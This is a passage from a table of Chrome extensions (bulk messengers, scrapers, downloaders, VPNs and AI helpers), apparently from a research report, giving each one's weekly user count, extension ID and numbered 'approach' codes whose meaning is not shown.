Free VPN For Chrome - HavenSurf VPN 1,000 ihikodioopffhlfhlcjafeleemecfmab 5
TelePlus - Multi-Accounts Sender 8,000 ihopneheidomphlibjllfheciogojmbk 1, 2, 5
Keywords Explorer For Google Play Store (ASO) 2,000 ijegkehhlkpmicapdfdjahdmpklimdmp 6
Mass follow for Twitter 1,000 ijppobefgfjffcajmniofbnjkooeneog 1, 5
Etsy Customer Service Helper with ChatGPT 506 ikddakibljikfamafepngmlnhjilbcci 5
Telegram Group and Channel Search Tool 7,000 ilpgiemienkecbgdhdbgdjkafodgfojl 1, 2, 5, 7
NoteGPT: Udemy Summary with ChatGPT & Claude 8,000 indcipieilphhkjlepfgnldhjejiichk 1, 2, 5
Volume booster - Volumax 2,000 ioklejjbhddpcdgmpcnnpaoopkcegopp 6
AmzGPT: Amazon listing edit 4,000 jijophmdjdapikfmbckmhhiheghkgoee 5
TTNote: Video Downloader and Saver 30,000 jilgamolkonoalagcpgjjijaclacillb 1, 2, 5
GS Helper For Google Search Google Scholar 2,000 jknbccibkbeiakegoengboimefmadcpn 5
WASender - WA Bulk Message Sender 1,000 jlhmomandpgagmphfnoglhikpedchjoa 1
ai celebrity voice clone 572 jlifdodinblfbkbfmjinkpjieglkgfko 1
WAPlus CRM - Best WhatsApp CRM with AI 60,000 jmjcgjmipjiklbnfbdclkdikplgajhgc 1
Save Webpage As PDF 10,000 jncaamlnmeladalnajhgbkedibfjlmde 5
Etsy™ Reviews Extractor 1,000 jobjhhfnfkdkmfcjnpdjmnmagepnbifi 5
AI Image Generator: Get AI Art with Any Input 1,000 jojlhafjflilmhpakmmnchhcbljgmllh 5
TG Sender - TG bulk message send and invite 20,000 kchbblidjcniipdkjlbjjakgdlbfnhgh 1, 2, 5
QR Code Generator 25 kdhpgmfhaakamldlajaigcnanajekhmp 1
Browser VPN - Free and unlimited VPN proxy 7,000 kdjilbflpbbilgehjjppohpfplnapkbp 5
Summary Duck Assistant 1,000 kdmiipofdmffkgfpkigioehfdehcienf 1, 2
FindNiche - aliexpress™ dropshipping & analytics tool 1,000 kgggfelpkelliecmgdmfjgnlnhfnohpi 2, 3, 5
LinkedRadar - Email Finder for LinkedIn ™ 50,000 kgpckhbdfdhbkfkepcoebpabkmnbhoke 1, 5
WA - Download Group Phone Numbers 4,000 khajmpchmhlhfcjdbkddimjbgbchbecl 1, 5
WA Self Sender for WhatsApp Web(Easy Sender) 10,000 khfmfdepnleebhonomgihppncahojfig 1
GPT for Ecom: Product Listing optimizer 20,000 khjklhhhlnbeponjimmaoeefcpgbpgna 1, 2, 5
IG Follower Export Tool - IG Tools 100,000 kicgclkbiilobmccmmidfghnijgfamdb 1, 2, 5
WhatsApp Realtime Translate&Account Warm Up&Voice message Transcript 1,000 kifbmlmhcfecpiidfebchholjeokjdlm 1, 5
WA Group Sender 10,000 kilbeicibedchlamahiimkjeilnkgmeo 5
FindNiche - Shopify™ store traffic analysis 7,000 kiniklbpicchjlhhagjhchoabjffogni 1, 2, 3, 5, 7
Telegram Restricted Content Downloader 7,000 kinmpocfdjcofdjfnpiiiohfbabfhhdd 1, 2
website broken link and 404 error checker 10,000 kkjfobdnekhdpmgomkpeibhlnmcjgian 1, 2, 5
TG Content Downloader - download telegram restricted files 983 kljkjamilbfohkmbacbdongkddmoliag 1, 5
Comment Assistant In LinkedIn™ 978 kmchjegahcidgahijkjoaheobkjjgkfj 5
Tab Manager - Smart Tab By NoteGPT AI 7,000 kmmcaankjjonnggaemhgkofiblbjaakf 1, 2, 5
WA Number Checker 5,000 knlfobadedihfdcamebpjmeocjjhchgm 1, 2
Telegram downloader - TG Video Photo Download 4,000 kofmimpajnbhfbdlijgcjmlhhkmcallg 1
WA Group Link Finder 2,000 kpinkllalgahfocbjnplingmpnhhihhp 1, 2
One-Click Search Ozon Similar Products 96 laoofjicjkiphingbhcblaojdcibmibn 5
WADeck - WA AI ChatBot &WhatsApp Sender 40,000 lbjgmhifiabkcifnmbakaejdcbikhiaj 1, 5
AliNiche Finder&ChatGPT Review Analysis 484 ldcmkjkhnmhoofhhfendhkfmckkcepnj 5
Fashion Model-AI Model Generator For Amazon 1,000 ldlimmbggiobfbblnjjpgdhnjdnlbpmo 1, 5
WhatsApp Group Management Pro - Export, Broadcast & Monitor Suite 20,000 ldodkdnfdpchaipnoklfnfmbbkdoocej 1, 2, 5
Photo download & Save image 8,000 leiiofmhppbjebdlnmbhnokpnmencemf 5
Aliexpress Customer Service Helper 191 lfacobmjpfgkicpkigjlgfjoopajphfc 5
Find WhatsApp Link - Group Invite Link 10,000 lfepbhhhpfohfckldbjoohmplpebdmnd 5
Yahoo - optimize listing & AI Writer 69 lgahpgiabdhiahneaooneicnhmafploc 5
Amazon Finder&ChatGPT Review Analysis 821 lgghbdmnfofefffidlignibjhnijabad 5
AI Resume Builder - LinkedRadar 10,000 lijdbieejfmoifapddolljfclangkeld 1, 4
Article Summary with ChatGPT and Take Notes 8,000 llkgpihjneoghmffllamjfhabmmcddfh 1, 2, 5
AliNiche - AliExpress™ Product Research Tool 30,000 lmlkbclipoijbhjcmfppfgibpknbefck 1, 2, 5
ModelAgents - AI Fashion Models Generator 5,000 lmnagehbedfomnnkacohdhdcglefbajd 5
Gmail Address Check & Send Verify Tool 2,000 lmpigfliddkbbpdojfpbbnginolfgdoh 5
WA Number Checker - Check & Verify WA Number 5,000 lobgnfjoknmnlljiedjgfffpcbaliomk 1
Free AI Voice: Best Text to Speech Tool 1,000 lokmkeahilhnjbmgdhohjkofnoplpmmp 5
IG Email Extractor - Ins Followers Exporter 3,000 lpcfhggocdlchakbpodhamiohpgebpop 1, 5
WA Bulk Sender 5,000 mbmlkjlaognpikjodedmallbdngnpbbn 1
YouTube Comment Summary with ChatGPT OpenAI 3,000 mcooieiakpekmoicpgfjheoijfggdhng 5
Ad Library - Ads Spy Tool For YouTube™ 2,000 mdbhllcalfkplbejlljailcmlghafjca 5
Schedule Email by Gmail 862 mdndafkgnjofegggbjhkccbipnebkmjc 1, 5
Feature Graphic Downloader for Play Store 546 meibcokbilaglcmbboefiocaiagghdki 5
One-Click Search eBay Similar Products 75 mjibhnpncmojamdnladbfpcafhobhegn 5
Twiclips - Twitch Clip Downloader 8,000 mjnnjgpeccmgcobgegepeljeedilebif 1, 2, 5
Auto Connect for LinkedIn™ - LeadRadar 1,000 mliipdijmfmbnemagicfibpffnejhcki 1
Easy Web Data Scraper 40,000 mndkmbnkepbhdlkhlofdfcmgflbjggnl 1, 2, 3, 5
wa privacy 68 nccgjmieghghlknedlgoeljlcacimpma 1
Ad Library - Ads Spy Tool For Pinterest™ 2,000 ndopljhdlodembijhnfkididjnahadoj 5
Universal Keyword Planner box 5,000 niaagjifaifoebkdkkndbhdoamicolmj 1, 2, 5
AdLibNote: Ad Library Downloader Facebook™ 30,000 niepmhdjjdggogblnljbdflekfohknmc 1, 2
WA Group Sender & Group Link Scraper 1,000 nimhpogohihnabaooccdllippcaaloie 1, 2
Ad Library - Ads Spy Tool For Twitter™ 1,000 nkdenifdmkabiopfhaiacfpllagnnfaj 5
TikTok Video Tags Summary with ChatGPT 860 nmccmoeihdmphnejppahljhfdggediec 5
Image Zoom Tool 5,000 nmpjkfaecjdmlebpoaofafgibnihjhhf 1, 2, 5
ChatSider:Free ChatGPT Assistant(GPT4) 1,000 nnadblfkldnlfoojndefddknlhmibjme 7
Telegram Channels - TG Channel Link Search 1,000 nnbjdempfaipgaaipadfgfpnjnnflakl 5
H1B Sponsor Checker, Job Seek - LinkedRadar 463 noiaognlgocndhfhbeikkoaoaedhignb 1, 4, 5
WAContactSaver 7,000 nolibfldemoaiibepbhlcdhjkkgejdhl 1
vk video downloader - vkSaver 10,000 npabddfopfjjlhlimlaknekipghedpfk 1, 2, 5
Multi Chat - All Chat In One For You - SocialPlus 1,000 oaknbnbgdgflakieopfmgegbpfliganc 1, 2, 5
Twitch Channel Points Auto Claimer -Twiclips 3,000 ocoimkjodcjigpcgfbnddnhfafonmado 5
WalmartHunt-Walmart Dropshipping Tools 4,000 oeadfeokeafokjbffnibccbbgbjcdefe 1, 2, 5
TTAdNote: Download and Save Ad No Watermark 8,000 oedligoomoifncjcboehdicibddaimja 1, 2, 5
Discordmate - Discord Chat Exporter 20,000 ofjlibelpafmdhigfgggickpejfomamk 5
Social Media Downloader - SocialPlus 4,000 ofnmkjeknmjdppkomohbapoldjmilbon 1
NoteGPT: ChatGPT Summary for Vimeo 5,000 oihfhipjjdpilmmejmbeoiggngmaaeko 1, 2, 5
Aliexpress search by image 5,000 ojpnmbhiomnnofaeblkgfgednipoflhd 1, 2, 5
Privacy Extension for WhatsApp Web 4,000 okglcjoemdnmmnodbllbcfaebeedddod 1
Denote: Save Ads TikTok & FB Ad Library 40,000 okieokifcnnigcgceookjighhplbhcip 1, 2
Allegro Customer Service Helper with Open AI 13 olfpfedccehidflokifnabppdkideeee 5
LinkedRadar - LinkedIn Auto Connect Tool 198 onjifbpemkphnaibpiibbdcginjaeokn 1
WAPI - Send personalized messages 20,000 onohcnjmnndegfjgbfdfaeooceefedji 1
Entrar for Gmail™ 5,000 oolgnmaocjjdlacpbbajnbooghihekpp 5
Group exporter 2 19 opeikahlidceaoaghglikdpfdkmegklg 1
Keyword Finder-SEO keywords Tool 5,000 oppmgphiknonmjjoepbnafmbcdiamjdh 5
Search Engine Featuring ChatGPT - GPT Search 775 pbeiddaffccibkippoefblnmjfmmdmne 1, 5
Amazon Price History Tracker - AmzChart 737 pboiilknppcopllbjjcpdhadoacfeedk 5
Shopify Wise - Shopify analytics & Dropship tool 762 pckpnbdneenegpkodapaeifpgmneefjd 5
Vimeo™ Video Downloader Pro 70,000 penndbmahnpapepljikkjmakcobdahne 5
DealsUpp - Contact Saver for WA 2,000 pfomiledcpfnldnldlffdebbpjnhkbbl 1, 5
Profile Scraper - Leadboot 2,000 pgijefijihpjioibahpfadkabebenoel 1
-com Remove Background 105 pgomkcdpmifelmdhdgejgnjeehpkmdgl 1
EasyGood - Free Unlimited VPN Proxy 1,000 pgpcjennihmkbbpifnjkdpkagpaggfaa 5
FindNiche - AliExpress™ Data Exporter 114 pjjofiojigimijfomcffnpjlcceijohm 5
Share Preview Save to Social 419 pkbmlamidkenakbhhialhdmmkijkhdee 1, 3
Voice Remaker - The Best AI Generator 10,000 pnlgifbohdiadfjllfmmjadcgofbnpoi 1, 5
Pincase-Pinterest Video & Image Downloader 10,000 poomkmbickjilkojghldlelgjmgaabic 5
Ad Library - Ad Finder & Adspy Tool 30,000 ppbmlcfgohokdanfpeoanjcdclffjncg 5
YouTube Video Tags Summary with ChatGPT 908 ppfomhocaedogacikjldipgomjdjalol 1, 5

ExtensionsBox

Name Weekly active users Extension ID Approaches
Amazon Reviews Extractor 1,000 aapmfnbcggnbcghjipmpcngmflbjjfnb 1, 2
Target Images Downloader 100 adeimcdlolcpdkaapelfnacjjnclpgpb 2
Airbnb Images Downloader 433 alaclngadohenllpjadnmpkplkpdlkni 1, 2
eBay Reviews Extractor 200 amagdhmieghdldeiagobdhiebncjdjod 2
Lazada Images Downloader 363 bcfjlfilhmdhoepgffdgdmeefkmifooo 1, 2
Shopify2Woo - Shopify to WooCommerce 543 bfnieimjkglmfojnnlillkenhnehlfcj 1, 2
Group Extractor 3,000 bggmbldgnfhohniedfopliimbiakhjhj 1, 2
Shein Reviews Extractor - Scrape Data to CSV 388 bgoemjkklalleicedfflkkmnnlcflnmd 1, 2
Airbnb Reviews Extractor 86 bklllkankabebbiipcfkcnmcegekeagj 1, 2
eBay Images Downloader 863 bkpjjpjajaogephjblhpjdmjmpihpepm 1, 2
Indeed Scraper 2,000 bneijclffbjaigpohjfnfmjpnaadchdd 1, 2
Shein to Shopify CSV Exportor 130 cacbnoblnhdipbdoimjhkjoonmgihkec 1, 2
Justdial Scraper 1,000 ccnfadfagdjnaehnpgceocdgajgieinn 1, 2
AI Review Summarizer - Get ChatGPT Review Analysis in One Click 24 cefjlfachafjglgeechpnnigkpcehbgf 2
Booking Hotel Scraper 123 cgfklhalcnhpnkecicjabhmhlgekdfic 1, 2
Contact Extractor for wa 2,000 chhclfoeakpicniabophhhnnjfhahjki 2
AI Reviews Summary for Google Maps 17 cmkkchmnekbopphncohohdaehlgpmegi 2
AliExpress Images Downloader 938 cpdanjpcekhgkcijkifoiicadebljobn 1, 2
Shopy - Shopify Spy 2,000 dehlcjmoincicbhdnkbnmkeaiapljnld 1, 2
Profile Scraper for LinkedIn™ 473 dmonpchcmpmiehffgbkoimkmlfomgmbc 1, 2
Trustpilot Reviews Extractor 481 eikaihjegpcchpmnjaodjigdfjanoamn 1, 2
Indeed Review Extractor 17 ejmkpbellnnjbkbagmgabogfnbkcbnkb 1, 2
AliExpress Reviews Extractor 409 elcljdecpbphfholhckkchdocegggbli 1, 2
Etsy Reviews Extractor 306 fbbobebaplnpchmkidpicipacnogcjpk 2
Post Scraper 34 fcldaoddodeaompgigjhplaalfhgphfo 2
Images Downloader for WM 707 fdakeeindhklmojjbfjhgmpodngnpcfk 1, 2
Twitch Chat Downloader 132 fkcglcjlhbfbechmbmcajldcfkcpklng 1, 2
Costco Images Downloader 35 fpicpahbllamfleebhiieejmagmpfepi 1, 2
Etsy Images Downloader 1,000 gbihcigegealfmeefgplcpejjdcpenbo 2
Yelp Scraper 347 gbpkfnpijffepibabnledidempoaanff 2
Lazada Reviews Extractor 102 gcfjmciddjfnjccpgijpmphhphlfbpgl 1, 2
Shopee Reviews Extractor 484 gddchobpnbecooaebohmcamdfooapmfj 2
Comments Exporter for Ins 47 gdhcgkncekkhebpefefeeahnojclbgeg 1, 2
Wayfair Images Downloader 169 ggcepafcjdcadpepeedmlhnokcejdlal 2
Amazon Images Downloader 1,000 ggfhamjeclabnmkdooogdjibkiffdpec 1, 2
Shein Images Downloader 3,000 ghnnkkhikjclkpldkbdopbpcocpchhoi 1, 2
Reviews Extractor for WM 369 gidbpinngggcpgnncphjnfjkneodombd 2
Zillow Scraper - Agent & Property Export 308 gjhcnbnbclgoiggjlghgnnckfmbfnhbb 2
G2 Reviews Extractor 189 hdnlkdbboofooabecgohocmglocfgflo 1, 2
X Jobs Scraper 35 hillidkidahkkchnaiikkoafeaojkjip 1, 2
Booking Reviews Extractor